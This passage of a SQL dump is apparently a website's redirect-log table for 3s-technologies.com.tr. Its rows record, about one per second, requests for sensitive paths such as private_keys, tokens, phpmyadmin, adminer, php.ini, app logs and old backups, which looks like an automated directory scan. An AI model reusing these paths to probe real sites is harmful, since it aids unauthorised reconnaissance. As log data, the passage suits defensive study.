17:25:10','0000-00-00 00:00:00',301),(65278,'http://3s-technologies.com.tr/en/testing',NULL,'','',1,0,'2026-05-22 17:25:11','0000-00-00 00:00:00',301),(65279,'http://3s-technologies.com.tr/en/tests',NULL,'','',1,0,'2026-05-22 17:25:12','0000-00-00 00:00:00',301),(65280,'http://3s-technologies.com.tr/en/test_data',NULL,'','',1,0,'2026-05-22 17:25:12','0000-00-00 00:00:00',301),(65281,'http://3s-technologies.com.tr/en/fixtures',NULL,'','',1,0,'2026-05-22 17:25:13','0000-00-00 00:00:00',301),(65282,'http://3s-technologies.com.tr/en/scripts',NULL,'','',1,0,'2026-05-22 17:25:13','0000-00-00 00:00:00',301),(65283,'http://3s-technologies.com.tr/en/console',NULL,'','',1,0,'2026-05-22 17:25:14','0000-00-00 00:00:00',301),(65284,'http://3s-technologies.com.tr/en/commands',NULL,'','',2,0,'2026-05-22 17:25:15','0000-00-00 00:00:00',301),(65285,'http://3s-technologies.com.tr/en/crons',NULL,'','',1,0,'2026-05-22 17:25:15','0000-00-00 00:00:00',301),(65286,'http://3s-technologies.com.tr/en/cron_jobs',NULL,'','',1,0,'2026-05-22 17:25:16','0000-00-00 00:00:00',301),(65287,'http://3s-technologies.com.tr/en/scheduler',NULL,'','',1,0,'2026-05-22 17:25:16','0000-00-00 00:00:00',301),(65288,'http://3s-technologies.com.tr/en/jobs',NULL,'','',1,0,'2026-05-22 17:25:17','0000-00-00 00:00:00',301),(65289,'http://3s-technologies.com.tr/en/queues',NULL,'','',1,0,'2026-05-22 17:25:17','0000-00-00 00:00:00',301),(65290,'http://3s-technologies.com.tr/en/queue',NULL,'','',1,0,'2026-05-22 17:25:18','0000-00-00 00:00:00',301),(65291,'http://3s-technologies.com.tr/en/workers',NULL,'','',1,0,'2026-05-22 17:25:18','0000-00-00 00:00:00',301),(65292,'http://3s-technologies.com.tr/en/logs/app',NULL,'','',1,0,'2026-05-22 17:25:19','0000-00-00 00:00:00',301),(65293,'http://3s-technologies.com.tr/en/logs/error',NULL,'','',1,0,'2026-05-22 17:25:19','0000-00-00 00:00:00',301),(65294,'http://3s-technologies.com.tr/en/logs/debug',NULL,'','',1,0,'2026-05-22 17:25:20','0000-00-00 00:00:00',301),(65295,'http://3s-technologies.com.tr/en/logs/access',NULL,'','',1,0,'2026-05-22 17:25:21','0000-00-00 00:00:00',301),(65296,'http://3s-technologies.com.tr/en/sessions',NULL,'','',1,0,'2026-05-22 17:25:21','0000-00-00 00:00:00',301),(65297,'http://3s-technologies.com.tr/en/session',NULL,'','',1,0,'2026-05-22 17:25:22','0000-00-00 00:00:00',301),(65298,'http://3s-technologies.com.tr/en/cookies',NULL,'','',1,0,'2026-05-22 17:25:22','0000-00-00 00:00:00',301),(65299,'http://3s-technologies.com.tr/en/token',NULL,'','',1,0,'2026-05-22 17:25:23','0000-00-00 00:00:00',301),(65300,'http://3s-technologies.com.tr/en/tokens',NULL,'','',1,0,'2026-05-22 17:25:23','0000-00-00 00:00:00',301),(65301,'http://3s-technologies.com.tr/en/certificates',NULL,'','',1,0,'2026-05-22 17:25:24','0000-00-00 00:00:00',301),(65302,'http://3s-technologies.com.tr/en/certs',NULL,'','',1,0,'2026-05-22 17:25:25','0000-00-00 00:00:00',301),(65303,'http://3s-technologies.com.tr/en/ssl',NULL,'','',1,0,'2026-05-22 17:25:25','0000-00-00 00:00:00',301),(65304,'http://3s-technologies.com.tr/en/keys',NULL,'','',1,0,'2026-05-22 17:25:26','0000-00-00 00:00:00',301),(65305,'http://3s-technologies.com.tr/en/private_keys',NULL,'','',1,0,'2026-05-22 17:25:26','0000-00-00 00:00:00',301),(65306,'http://3s-technologies.com.tr/en/encryption',NULL,'','',1,0,'2026-05-22 17:25:27','0000-00-00 00:00:00',301),(65307,'http://3s-technologies.com.tr/en/decryption',NULL,'','',1,0,'2026-05-22 17:25:27','0000-00-00 00:00:00',301),(65308,'http://3s-technologies.com.tr/en/encode',NULL,'','',1,0,'2026-05-22 17:25:28','0000-00-00 00:00:00',301),(65309,'http://3s-technologies.com.tr/en/decode',NULL,'','',1,0,'2026-05-22 17:25:28','0000-00-00 00:00:00',301),(65310,'http://3s-technologies.com.tr/en/compress',NULL,'','',1,0,'2026-05-22 17:25:29','0000-00-00 00:00:00',301),(65311,'http://3s-technologies.com.tr/en/decompress',NULL,'','',1,0,'2026-05-22 17:25:29','0000-00-00 00:00:00',301),(65312,'http://3s-technologies.com.tr/en/zip',NULL,'','',1,0,'2026-05-22 17:25:30','0000-00-00 00:00:00',301),(65313,'http://3s-technologies.com.tr/en/unzip',NULL,'','',1,0,'2026-05-22 17:25:30','0000-00-00 00:00:00',301),(65314,'http://3s-technologies.com.tr/en/pdf',NULL,'','',1,0,'2026-05-22 17:25:32','0000-00-00 00:00:00',301),(65315,'http://3s-technologies.com.tr/en/documents',NULL,'','',1,0,'2026-05-22 17:25:32','0000-00-00 00:00:00',301),(65316,'http://3s-technologies.com.tr/en/downloads',NULL,'','',2,0,'2026-05-22 17:25:33','0000-00-00 00:00:00',301),(65317,'http://3s-technologies.com.tr/en/download',NULL,'','',2,0,'2026-05-22 17:25:34','0000-00-00 00:00:00',301),(65318,'http://3s-technologies.com.tr/en/reports',NULL,'','',1,0,'2026-05-22 17:25:34','0000-00-00 00:00:00',301),(65319,'http://3s-technologies.com.tr/en/report',NULL,'','',1,0,'2026-05-22 17:25:35','0000-00-00 00:00:00',301),(65320,'http://3s-technologies.com.tr/en/statistics',NULL,'','',1,0,'2026-05-22 17:25:35','0000-00-00 00:00:00',301),(65321,'http://3s-technologies.com.tr/en/analytics',NULL,'','',1,0,'2026-05-22 17:25:36','0000-00-00 00:00:00',301),(65322,'http://3s-technologies.com.tr/en/monitoring',NULL,'','',1,0,'2026-05-22 17:25:37','0000-00-00 00:00:00',301),(65323,'http://3s-technologies.com.tr/en/metrics',NULL,'','',1,0,'2026-05-22 17:25:37','0000-00-00 00:00:00',301),(65324,'http://3s-technologies.com.tr/en/grafana',NULL,'','',1,0,'2026-05-22 17:25:38','0000-00-00 00:00:00',301),(65325,'http://3s-technologies.com.tr/en/prometheus',NULL,'','',1,0,'2026-05-22 17:25:38','0000-00-00 00:00:00',301),(65326,'http://3s-technologies.com.tr/en/docker',NULL,'','',1,0,'2026-05-22 17:25:39','0000-00-00 00:00:00',301),(65327,'http://3s-technologies.com.tr/en/k8s',NULL,'','',1,0,'2026-05-22 17:25:40','0000-00-00 00:00:00',301),(65328,'http://3s-technologies.com.tr/en/kubernetes',NULL,'','',1,0,'2026-05-22 17:25:40','0000-00-00 00:00:00',301),(65329,'http://3s-technologies.com.tr/en/helm',NULL,'','',1,0,'2026-05-22 17:25:41','0000-00-00 00:00:00',301),(65330,'http://3s-technologies.com.tr/en/deploy',NULL,'','',1,0,'2026-05-22 17:25:42','0000-00-00 00:00:00',301),(65331,'http://3s-technologies.com.tr/en/deployment',NULL,'','',1,0,'2026-05-22 17:25:42','0000-00-00 00:00:00',301),(65332,'http://3s-technologies.com.tr/en/releases',NULL,'','',1,0,'2026-05-22 17:25:42','0000-00-00 00:00:00',301),(65333,'http://3s-technologies.com.tr/en/release',NULL,'','',1,0,'2026-05-22 17:25:43','0000-00-00 00:00:00',301),(65334,'http://3s-technologies.com.tr/en/ci',NULL,'','',1,0,'2026-05-22 17:25:44','0000-00-00 00:00:00',301),(65335,'http://3s-technologies.com.tr/en/cd',NULL,'','',1,0,'2026-05-22 17:25:44','0000-00-00 00:00:00',301),(65336,'http://3s-technologies.com.tr/en/jenkins',NULL,'','',1,0,'2026-05-22 17:25:45','0000-00-00 00:00:00',301),(65337,'http://3s-technologies.com.tr/en/gitlab-ci',NULL,'','',1,0,'2026-05-22 17:25:46','0000-00-00 00:00:00',301),(65338,'http://3s-technologies.com.tr/en/github-actions',NULL,'','',1,0,'2026-05-22 17:25:46','0000-00-00 00:00:00',301),(65339,'http://3s-technologies.com.tr/en/configs',NULL,'','',1,0,'2026-05-22 17:25:47','0000-00-00 00:00:00',301),(65340,'http://3s-technologies.com.tr/en/configuration',NULL,'','',1,0,'2026-05-22 17:25:47','0000-00-00 00:00:00',301),(65341,'http://3s-technologies.com.tr/en/settings',NULL,'','',1,0,'2026-05-22 17:25:47','0000-00-00 00:00:00',301),(65342,'http://3s-technologies.com.tr/en/environment',NULL,'','',1,0,'2026-05-22 17:25:48','0000-00-00 00:00:00',301),(65343,'http://3s-technologies.com.tr/en/envs',NULL,'','',1,0,'2026-05-22 17:25:49','0000-00-00 00:00:00',301),(65344,'http://3s-technologies.com.tr/en/environment_variables',NULL,'','',1,0,'2026-05-22 17:25:49','0000-00-00 00:00:00',301),(65345,'http://3s-technologies.com.tr/en/middleware',NULL,'','',1,0,'2026-05-22 17:25:50','0000-00-00 00:00:00',301),(65346,'http://3s-technologies.com.tr/en/filters',NULL,'','',1,0,'2026-05-22 17:25:50','0000-00-00 00:00:00',301),(65347,'http://3s-technologies.com.tr/en/interceptors',NULL,'','',1,0,'2026-05-22 17:25:51','0000-00-00 00:00:00',301),(65348,'http://3s-technologies.com.tr/en/validators',NULL,'','',1,0,'2026-05-22 17:25:52','0000-00-00 00:00:00',301),(65349,'http://3s-technologies.com.tr/en/validation',NULL,'','',1,0,'2026-05-22 17:25:52','0000-00-00 00:00:00',301),(65350,'http://3s-technologies.com.tr/en/form_validation',NULL,'','',1,0,'2026-05-22 17:25:53','0000-00-00 00:00:00',301),(65351,'http://3s-technologies.com.tr/en/partials',NULL,'','',1,0,'2026-05-22 17:25:54','0000-00-00 00:00:00',301),(65352,'http://3s-technologies.com.tr/en/helpers',NULL,'','',1,0,'2026-05-22 17:25:55','0000-00-00 00:00:00',301),(65353,'http://3s-technologies.com.tr/en/helper',NULL,'','',1,0,'2026-05-22 17:25:55','0000-00-00 00:00:00',301),(65354,'http://3s-technologies.com.tr/en/utilities',NULL,'','',1,0,'2026-05-22 17:25:56','0000-00-00 00:00:00',301),(65355,'http://3s-technologies.com.tr/en/utils',NULL,'','',1,0,'2026-05-22 17:25:56','0000-00-00 00:00:00',301),(65356,'http://3s-technologies.com.tr/en/lib',NULL,'','',1,0,'2026-05-22 17:25:57','0000-00-00 00:00:00',301),(65357,'http://3s-technologies.com.tr/en/packages',NULL,'','',1,0,'2026-05-22 17:25:58','0000-00-00 00:00:00',301),(65358,'http://3s-technologies.com.tr/en/extensions',NULL,'','',1,0,'2026-05-22 17:25:58','0000-00-00 00:00:00',301),(65359,'http://3s-technologies.com.tr/en/extension',NULL,'','',1,0,'2026-05-22 17:25:59','0000-00-00 00:00:00',301),(65360,'http://3s-technologies.com.tr/en/addons',NULL,'','',1,0,'2026-05-22 17:25:59','0000-00-00 00:00:00',301),(65361,'http://3s-technologies.com.tr/en/addon',NULL,'','',1,0,'2026-05-22 17:26:00','0000-00-00 00:00:00',301),(65362,'http://3s-technologies.com.tr/en/widgets',NULL,'','',1,0,'2026-05-22 17:26:01','0000-00-00 00:00:00',301),(65363,'http://3s-technologies.com.tr/en/widget',NULL,'','',1,0,'2026-05-22 17:26:01','0000-00-00 00:00:00',301),(65364,'http://3s-technologies.com.tr/en/blocks',NULL,'','',1,0,'2026-05-22 17:26:02','0000-00-00 00:00:00',301),(65365,'http://3s-technologies.com.tr/en/block',NULL,'','',1,0,'2026-05-22 17:26:02','0000-00-00 00:00:00',301),(65366,'http://3s-technologies.com.tr/en/elements',NULL,'','',1,0,'2026-05-22 17:26:03','0000-00-00 00:00:00',301),(65367,'http://3s-technologies.com.tr/en/component',NULL,'','',1,0,'2026-05-22 17:26:04','0000-00-00 00:00:00',301),(65368,'http://3s-technologies.com.tr/en/controllers',NULL,'','',1,0,'2026-05-22 17:26:04','0000-00-00 00:00:00',301),(65369,'http://3s-technologies.com.tr/en/controller',NULL,'','',1,0,'2026-05-22 17:26:05','0000-00-00 00:00:00',301),(65370,'http://3s-technologies.com.tr/en/handlers',NULL,'','',2,0,'2026-05-22 17:26:05','0000-00-00 00:00:00',301),(65371,'http://3s-technologies.com.tr/en/handler',NULL,'','',2,0,'2026-05-22 17:26:06','0000-00-00 00:00:00',301),(65372,'http://3s-technologies.com.tr/en/models',NULL,'','',2,0,'2026-05-22 17:26:07','0000-00-00 00:00:00',301),(65373,'http://3s-technologies.com.tr/en/model',NULL,'','',1,0,'2026-05-22 17:26:07','0000-00-00 00:00:00',301),(65374,'http://3s-technologies.com.tr/en/repositories',NULL,'','',1,0,'2026-05-22 17:26:07','0000-00-00 00:00:00',301),(65375,'http://3s-technologies.com.tr/en/repository',NULL,'','',1,0,'2026-05-22 17:26:08','0000-00-00 00:00:00',301),(65376,'http://3s-technologies.com.tr/en/services',NULL,'','',1,0,'2026-05-22 17:26:08','0000-00-00 00:00:00',301),(65377,'http://3s-technologies.com.tr/en/service',NULL,'','',1,0,'2026-05-22 17:26:09','0000-00-00 00:00:00',301),(65378,'http://3s-technologies.com.tr/en/providers',NULL,'','',1,0,'2026-05-22 17:26:10','0000-00-00 00:00:00',301),(65379,'http://3s-technologies.com.tr/en/provider',NULL,'','',1,0,'2026-05-22 17:26:10','0000-00-00 00:00:00',301),(65380,'http://3s-technologies.com.tr/en/factories',NULL,'','',1,0,'2026-05-22 17:26:11','0000-00-00 00:00:00',301),(65381,'http://3s-technologies.com.tr/en/factory',NULL,'','',1,0,'2026-05-22 17:26:11','0000-00-00 00:00:00',301),(65382,'http://3s-technologies.com.tr/en/builders',NULL,'','',1,0,'2026-05-22 17:26:12','0000-00-00 00:00:00',301),(65383,'http://3s-technologies.com.tr/en/builder',NULL,'','',1,0,'2026-05-22 17:26:12','0000-00-00 00:00:00',301),(65384,'http://3s-technologies.com.tr/en/decorators',NULL,'','',1,0,'2026-05-22 17:26:13','0000-00-00 00:00:00',301),(65385,'http://3s-technologies.com.tr/en/decorator',NULL,'','',1,0,'2026-05-22 17:26:14','0000-00-00 00:00:00',301),(65386,'http://3s-technologies.com.tr/en/adapters',NULL,'','',1,0,'2026-05-22 17:26:14','0000-00-00 00:00:00',301),(65387,'http://3s-technologies.com.tr/en/adapter',NULL,'','',1,0,'2026-05-22 17:26:15','0000-00-00 00:00:00',301),(65388,'http://3s-technologies.com.tr/en/listeners',NULL,'','',1,0,'2026-05-22 17:26:15','0000-00-00 00:00:00',301),(65389,'http://3s-technologies.com.tr/en/listener',NULL,'','',1,0,'2026-05-22 17:26:16','0000-00-00 00:00:00',301),(65390,'http://3s-technologies.com.tr/en/subscribers',NULL,'','',1,0,'2026-05-22 17:26:16','0000-00-00 00:00:00',301),(65391,'http://3s-technologies.com.tr/en/subscriber',NULL,'','',1,0,'2026-05-22 17:26:17','0000-00-00 00:00:00',301),(65392,'http://3s-technologies.com.tr/en/events',NULL,'','',1,0,'2026-05-22 17:26:17','0000-00-00 00:00:00',301),(65393,'http://3s-technologies.com.tr/en/event',NULL,'','',2,0,'2026-05-22 17:26:18','0000-00-00 00:00:00',301),(65394,'http://3s-technologies.com.tr/en/command',NULL,'','',1,0,'2026-05-22 17:26:19','0000-00-00 00:00:00',301),(65395,'http://3s-technologies.com.tr/en/queries',NULL,'','',1,0,'2026-05-22 17:26:19','0000-00-00 00:00:00',301),(65396,'http://3s-technologies.com.tr/en/query',NULL,'','',1,0,'2026-05-22 17:26:20','0000-00-00 00:00:00',301),(65397,'http://3s-technologies.com.tr/en/dto',NULL,'','',1,0,'2026-05-22 17:26:21','0000-00-00 00:00:00',301),(65398,'http://3s-technologies.com.tr/en/dtos',NULL,'','',1,0,'2026-05-22 17:26:22','0000-00-00 00:00:00',301),(65399,'http://3s-technologies.com.tr/en/transformer',NULL,'','',1,0,'2026-05-22 17:26:22','0000-00-00 00:00:00',301),(65400,'http://3s-technologies.com.tr/en/transformers',NULL,'','',1,0,'2026-05-22 17:26:23','0000-00-00 00:00:00',301),(65401,'http://3s-technologies.com.tr/en/serializers',NULL,'','',1,0,'2026-05-22 17:26:23','0000-00-00 00:00:00',301),(65402,'http://3s-technologies.com.tr/en/serializer',NULL,'','',1,0,'2026-05-22 17:26:24','0000-00-00 00:00:00',301),(65403,'http://3s-technologies.com.tr/en/normalizers',NULL,'','',1,0,'2026-05-22 17:26:24','0000-00-00 00:00:00',301),(65404,'http://3s-technologies.com.tr/en/normalizer',NULL,'','',1,0,'2026-05-22 17:26:25','0000-00-00 00:00:00',301),(65405,'http://3s-technologies.com.tr/en/presenters',NULL,'','',1,0,'2026-05-22 17:26:25','0000-00-00 00:00:00',301),(65406,'http://3s-technologies.com.tr/en/presenter',NULL,'','',1,0,'2026-05-22 17:26:26','0000-00-00 00:00:00',301),(65407,'http://3s-technologies.com.tr/en/view_models',NULL,'','',1,0,'2026-05-22 17:26:26','0000-00-00 00:00:00',301),(65408,'http://3s-technologies.com.tr/en/view_model',NULL,'','',1,0,'2026-05-22 17:26:27','0000-00-00 00:00:00',301),(65409,'http://3s-technologies.com.tr/en/forms',NULL,'','',1,0,'2026-05-22 17:26:27','0000-00-00 00:00:00',301),(65410,'http://3s-technologies.com.tr/en/form',NULL,'','',1,0,'2026-05-22 17:26:28','0000-00-00 00:00:00',301),(65411,'http://3s-technologies.com.tr/en/requests',NULL,'','',1,0,'2026-05-22 17:26:28','0000-00-00 00:00:00',301),(65412,'http://3s-technologies.com.tr/en/request',NULL,'','',1,0,'2026-05-22 17:26:29','0000-00-00 00:00:00',301),(65413,'http://3s-technologies.com.tr/en/responses',NULL,'','',1,0,'2026-05-22 17:26:29','0000-00-00 00:00:00',301),(65414,'http://3s-technologies.com.tr/en/response',NULL,'','',1,0,'2026-05-22 17:26:29','0000-00-00 00:00:00',301),(65415,'http://3s-technologies.com.tr/en/exceptions',NULL,'','',1,0,'2026-05-22 17:26:30','0000-00-00 00:00:00',301),(65416,'http://3s-technologies.com.tr/en/exception',NULL,'','',1,0,'2026-05-22 17:26:31','0000-00-00 00:00:00',301),(65417,'http://3s-technologies.com.tr/en/errors',NULL,'','',2,0,'2026-05-22 17:26:31','0000-00-00 00:00:00',301),(65418,'http://3s-technologies.com.tr/en/error',NULL,'','',2,0,'2026-05-22 17:26:32','0000-00-00 00:00:00',301),(65419,'http://3s-technologies.com.tr/en/faults',NULL,'','',1,0,'2026-05-22 17:26:32','0000-00-00 00:00:00',301),(65420,'http://3s-technologies.com.tr/en/fault',NULL,'','',1,0,'2026-05-22 17:26:32','0000-00-00 00:00:00',301),(65421,'http://3s-technologies.com.tr/en/constants',NULL,'','',1,0,'2026-05-22 17:26:33','0000-00-00 00:00:00',301),(65422,'http://3s-technologies.com.tr/en/constant',NULL,'','',1,0,'2026-05-22 17:26:34','0000-00-00 00:00:00',301),(65423,'http://3s-technologies.com.tr/en/enums',NULL,'','',1,0,'2026-05-22 17:26:34','0000-00-00 00:00:00',301),(65424,'http://3s-technologies.com.tr/en/enum',NULL,'','',1,0,'2026-05-22 17:26:35','0000-00-00 00:00:00',301),(65425,'http://3s-technologies.com.tr/en/interfaces',NULL,'','',1,0,'2026-05-22 17:26:35','0000-00-00 00:00:00',301),(65426,'http://3s-technologies.com.tr/en/interface',NULL,'','',1,0,'2026-05-22 17:26:36','0000-00-00 00:00:00',301),(65427,'http://3s-technologies.com.tr/en/traits',NULL,'','',1,0,'2026-05-22 17:26:36','0000-00-00 00:00:00',301),(65428,'http://3s-technologies.com.tr/en/trait',NULL,'','',1,0,'2026-05-22 17:26:37','0000-00-00 00:00:00',301),(65429,'http://3s-technologies.com.tr/en/abstracts',NULL,'','',1,0,'2026-05-22 17:26:37','0000-00-00 00:00:00',301),(65430,'http://3s-technologies.com.tr/en/abstract',NULL,'','',1,0,'2026-05-22 17:26:38','0000-00-00 00:00:00',301),(65431,'http://3s-technologies.com.tr/en/bases',NULL,'','',1,0,'2026-05-22 17:26:38','0000-00-00 00:00:00',301),(65432,'http://3s-technologies.com.tr/en/base',NULL,'','',1,0,'2026-05-22 17:26:39','0000-00-00 00:00:00',301),(65433,'http://3s-technologies.com.tr/en/common',NULL,'','',1,0,'2026-05-22 17:26:40','0000-00-00 00:00:00',301),(65434,'http://3s-technologies.com.tr/en/shared',NULL,'','',1,0,'2026-05-22 17:26:40','0000-00-00 00:00:00',301),(65435,'http://3s-technologies.com.tr/en/support',NULL,'','',1,0,'2026-05-22 17:26:41','0000-00-00 00:00:00',301),(65436,'http://3s-technologies.com.tr/en/platform',NULL,'','',1,0,'2026-05-22 17:26:41','0000-00-00 00:00:00',301),(65437,'http://3s-technologies.com.tr/en/framework',NULL,'','',1,0,'2026-05-22 17:26:42','0000-00-00 00:00:00',301),(65438,'http://3s-technologies.com.tr/en/engine',NULL,'','',1,0,'2026-05-22 17:26:42','0000-00-00 00:00:00',301),(65439,'http://3s-technologies.com.tr/en/legacy',NULL,'','',1,0,'2026-05-22 17:26:43','0000-00-00 00:00:00',301),(65440,'http://3s-technologies.com.tr/en/legacy_code',NULL,'','',1,0,'2026-05-22 17:26:44','0000-00-00 00:00:00',301),(65441,'http://3s-technologies.com.tr/en/deprecated',NULL,'','',1,0,'2026-05-22 17:26:44','0000-00-00 00:00:00',301),(65442,'http://3s-technologies.com.tr/en/old_code',NULL,'','',1,0,'2026-05-22 17:26:45','0000-00-00 00:00:00',301),(65443,'http://3s-technologies.com.tr/en/patches',NULL,'','',1,0,'2026-05-22 17:26:45','0000-00-00 00:00:00',301),(65444,'http://3s-technologies.com.tr/en/patch',NULL,'','',1,0,'2026-05-22 17:26:46','0000-00-00 00:00:00',301),(65445,'http://3s-technologies.com.tr/en/hotfixes',NULL,'','',1,0,'2026-05-22 17:26:46','0000-00-00 00:00:00',301),(65446,'http://3s-technologies.com.tr/en/hotfix',NULL,'','',1,0,'2026-05-22 17:26:47','0000-00-00 00:00:00',301),(65447,'http://3s-technologies.com.tr/en/maintenance',NULL,'','',1,0,'2026-05-22 17:26:47','0000-00-00 00:00:00',301),(65448,'http://3s-technologies.com.tr/en/maintain',NULL,'','',1,0,'2026-05-22 17:26:48','0000-00-00 00:00:00',301),(65449,'http://3s-technologies.com.tr/en/updates',NULL,'','',1,0,'2026-05-22 17:26:48','0000-00-00 00:00:00',301),(65450,'http://3s-technologies.com.tr/en/update',NULL,'','',1,0,'2026-05-22 17:26:49','0000-00-00 00:00:00',301),(65451,'http://3s-technologies.com.tr/en/bugfixes',NULL,'','',1,0,'2026-05-22 17:26:49','0000-00-00 00:00:00',301),(65452,'http://3s-technologies.com.tr/en/fixes',NULL,'','',1,0,'2026-05-22 17:26:50','0000-00-00 00:00:00',301),(65453,'http://3s-technologies.com.tr/en/.well-known/change-password',NULL,'','',1,0,'2026-05-22 17:26:51','0000-00-00 00:00:00',301),(65454,'http://3s-technologies.com.tr/en/.well-known/webfinger',NULL,'','',1,0,'2026-05-22 17:26:52','0000-00-00 00:00:00',301),(65455,'http://3s-technologies.com.tr/en/cgi-local',NULL,'','',1,0,'2026-05-22 17:26:53','0000-00-00 00:00:00',301),(65456,'http://3s-technologies.com.tr/en/fcgi-bin',NULL,'','',1,0,'2026-05-22 17:26:53','0000-00-00 00:00:00',301),(65457,'http://3s-technologies.com.tr/en/fastcgi-bin',NULL,'','',1,0,'2026-05-22 17:26:54','0000-00-00 00:00:00',301),(65458,'http://3s-technologies.com.tr/en/icons',NULL,'','',1,0,'2026-05-22 17:26:54','0000-00-00 00:00:00',301),(65459,'http://3s-technologies.com.tr/en/icons/small',NULL,'','',1,0,'2026-05-22 17:26:55','0000-00-00 00:00:00',301),(65460,'http://3s-technologies.com.tr/en/icons/large',NULL,'','',1,0,'2026-05-22 17:26:55','0000-00-00 00:00:00',301),(65461,'http://3s-technologies.com.tr/en/error_docs',NULL,'','',1,0,'2026-05-22 17:26:56','0000-00-00 00:00:00',301),(65462,'http://3s-technologies.com.tr/en/errordocs',NULL,'','',1,0,'2026-05-22 17:26:57','0000-00-00 00:00:00',301),(65463,'http://3s-technologies.com.tr/en/errorpages',NULL,'','',1,0,'2026-05-22 17:26:58','0000-00-00 00:00:00',301),(65464,'http://3s-technologies.com.tr/en/wp-content/nginx.conf',NULL,'','',1,0,'2026-05-22 17:27:04','0000-00-00 00:00:00',301),(65465,'http://3s-technologies.com.tr/en/wp-content/php.ini',NULL,'','',1,0,'2026-05-22 17:27:05','0000-00-00 00:00:00',301),(65466,'http://3s-technologies.com.tr/en/storage/framework/cache/data',NULL,'','',1,0,'2026-05-22 17:27:05','0000-00-00 00:00:00',301),(65467,'http://3s-technologies.com.tr/en/storage/framework/cache/locks',NULL,'','',1,0,'2026-05-22 17:27:06','0000-00-00 00:00:00',301),(65468,'http://3s-technologies.com.tr/en/storage/logs/lumen.log',NULL,'','',1,0,'2026-05-22 17:27:08','0000-00-00 00:00:00',301),(65469,'http://3s-technologies.com.tr/en/file-upload',NULL,'','',1,0,'2026-05-22 17:27:10','0000-00-00 00:00:00',301),(65470,'http://3s-technologies.com.tr/en/file-manager',NULL,'','',1,0,'2026-05-22 17:27:10','0000-00-00 00:00:00',301),(65471,'http://3s-technologies.com.tr/en/editor',NULL,'','',1,0,'2026-05-22 17:27:11','0000-00-00 00:00:00',301),(65472,'http://3s-technologies.com.tr/en/ckeditor',NULL,'','',1,0,'2026-05-22 17:27:11','0000-00-00 00:00:00',301),(65473,'http://3s-technologies.com.tr/en/tinymce',NULL,'','',1,0,'2026-05-22 17:27:12','0000-00-00 00:00:00',301),(65474,'http://3s-technologies.com.tr/en/froala',NULL,'','',1,0,'2026-05-22 17:27:12','0000-00-00 00:00:00',301),(65475,'http://3s-technologies.com.tr/en/calendar',NULL,'','',1,0,'2026-05-22 17:27:13','0000-00-00 00:00:00',301),(65476,'http://3s-technologies.com.tr/en/schedule',NULL,'','',1,0,'2026-05-22 17:27:14','0000-00-00 00:00:00',301),(65477,'http://3s-technologies.com.tr/en/booking',NULL,'','',1,0,'2026-05-22 17:27:15','0000-00-00 00:00:00',301),(65478,'http://3s-technologies.com.tr/en/newsletter',NULL,'','',1,0,'2026-05-22 17:27:15','0000-00-00 00:00:00',301),(65479,'http://3s-technologies.com.tr/en/email',NULL,'','',1,0,'2026-05-22 17:27:16','0000-00-00 00:00:00',301),(65480,'http://3s-technologies.com.tr/en/mailer',NULL,'','',1,0,'2026-05-22 17:27:16','0000-00-00 00:00:00',301),(65481,'http://3s-technologies.com.tr/en/sendmail',NULL,'','',1,0,'2026-05-22 17:27:17','0000-00-00 00:00:00',301),(65482,'http://3s-technologies.com.tr/en/sms',NULL,'','',1,0,'2026-05-22 17:27:17','0000-00-00 00:00:00',301),(65483,'http://3s-technologies.com.tr/en/notifications',NULL,'','',1,0,'2026-05-22 17:27:18','0000-00-00 00:00:00',301),(65484,'http://3s-technologies.com.tr/en/push-notifications',NULL,'','',1,0,'2026-05-22 17:27:18','0000-00-00 00:00:00',301),(65485,'http://3s-technologies.com.tr/en/websocket',NULL,'','',1,0,'2026-05-22 17:27:19','0000-00-00 00:00:00',301),(65486,'http://3s-technologies.com.tr/en/chat',NULL,'','',1,0,'2026-05-22 17:27:19','0000-00-00 00:00:00',301),(65487,'http://3s-technologies.com.tr/en/messaging',NULL,'','',1,0,'2026-05-22 17:27:20','0000-00-00 00:00:00',301),(65488,'http://3s-technologies.com.tr/en/messages',NULL,'','',1,0,'2026-05-22 17:27:21','0000-00-00 00:00:00',301),(65489,'http://3s-technologies.com.tr/en/conversations',NULL,'','',1,0,'2026-05-22 17:27:21','0000-00-00 00:00:00',301),(65490,'http://3s-technologies.com.tr/en/profile',NULL,'','',1,0,'2026-05-22 17:27:22','0000-00-00 00:00:00',301),(65491,'http://3s-technologies.com.tr/en/users',NULL,'','',1,0,'2026-05-22 17:27:23','0000-00-00 00:00:00',301),(65492,'http://3s-technologies.com.tr/en/account',NULL,'','',1,0,'2026-05-22 17:27:24','0000-00-00 00:00:00',301),(65493,'http://3s-technologies.com.tr/en/dashboard',NULL,'','',1,0,'2026-05-22 17:27:24','0000-00-00 00:00:00',301),(65494,'http://3s-technologies.com.tr/en/manager',NULL,'','',1,0,'2026-05-22 17:27:26','0000-00-00 00:00:00',301),(65495,'http://3s-technologies.com.tr/en/control-panel',NULL,'','',1,0,'2026-05-22 17:27:26','0000-00-00 00:00:00',301),(65496,'http://3s-technologies.com.tr/en/roundcube',NULL,'','',1,0,'2026-05-22 17:27:27','0000-00-00 00:00:00',301),(65497,'http://3s-technologies.com.tr/en/squirrelmail',NULL,'','',1,0,'2026-05-22 17:27:28','0000-00-00 00:00:00',301),(65498,'http://3s-technologies.com.tr/en/phpmyadmin',NULL,'','',1,0,'2026-05-22 17:27:28','0000-00-00 00:00:00',301),(65499,'http://3s-technologies.com.tr/en/phppgadmin',NULL,'','',1,0,'2026-05-22 17:27:29','0000-00-00 00:00:00',301),(65500,'http://3s-technologies.com.tr/en/adminer',NULL,'','',1,0,'2026-05-22 17:27:30','0000-00-00 00:00:00',301),(65501,'http://3s-technologies.com.tr/en/mysql-admin',NULL,'','',1,0,'2026-05-22 17:27:30','0000-00-00 00:00:00',301),(65502,'http://3s-technologies.com.tr/en/webmin',NULL,'','',1,0,'2026-05-22 17:27:31','0000-00-00 00:00:00',301),(65503,'http://3s-technologies.com.tr/en/virtualmin',NULL,'','',1,0,'2026-05-22 17:27:31','0000-00-00 00:00:00',301),(65504,'http://3s-technologies.com.tr/en/ispconfig',NULL,'','',1,0,'2026-05-22 17:27:32','0000-00-00 00:00:00',301),(65505,'http://3s-technologies.com.tr/en/backup_old',NULL,'','',1,0,'2026-05-22 17:27:32','0000-00-00 00:00:00',301),(65506,'http://3s-technologies.com.tr/en/backup_archive',NULL,'','',1,0,'2026-05-22 17:27:33','0000-00-00 00:00:00',301),(65507,'http://3s-technologies.com.tr/en/backup_2024',NULL,'','',1,0,'2026-05-22 17:27:33','0000-00-00 